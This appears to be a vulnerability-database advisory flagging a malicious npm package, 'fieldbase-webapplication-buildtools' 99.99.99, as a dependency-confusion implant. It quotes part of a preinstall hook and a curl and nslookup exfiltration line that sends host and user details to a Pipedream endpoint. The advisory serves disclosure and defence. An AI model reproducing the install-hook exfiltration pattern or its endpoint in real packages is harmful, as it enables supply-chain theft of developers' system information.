VDB
GCVE-110-OSM-2026-11594
GCVE-110-OSM-2026-11594
Advisory PublishedCVSS 9.6/10
The OpenSSF Package Analysis project identified 'fieldbase-webapplication-buildtools' @ 99.99.99 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
Judge assessment: This looks like a dependency-confusion style implant by a fresh attacker-controlled npm account, with a preinstall/install hook that runs a shell pipeline to collect $(whoami), $(hostname), $(pwd), and $npm_package_name and then sends it to a Pipedream endpoint. The literal curl to https://eoy34oyrep9j5x8.m.pipedream.net/$b64; and the nslookup of pkgdns.eoy34oyrep9j5x8.m.pipedream.net are clear exfil/C2 behaviors, not legitimate build tooling. The package version 99.99.99, one-off publication, no repository, and brand-new publisher strengthen the attacker model that this is a malicious public package meant to outrank an internal package name. The OSV MAL advisory is corroborated by the actual package.json contents and recovered IOCs.
ENTRY
index.js (main: index.js)
- Preinstall Script in package.json: ""preinstall": "b64=$(printf '%s' \""
DESTINATION
- 3 exfil (custom-c2)
(values recorded in verified_iocs)
EXFIL
- OAST/Interactsh Exfiltration in package.json: "pipedream.net"
ADDITIONAL FINDINGS
- Brand New Package
- Very New NPM Publisher Account
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | fieldbase-webapplication-buildtools | all (affected) | — |
Aliases
Browse GCVE Records
3,521 records in the GCVE database · Updated September 6, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.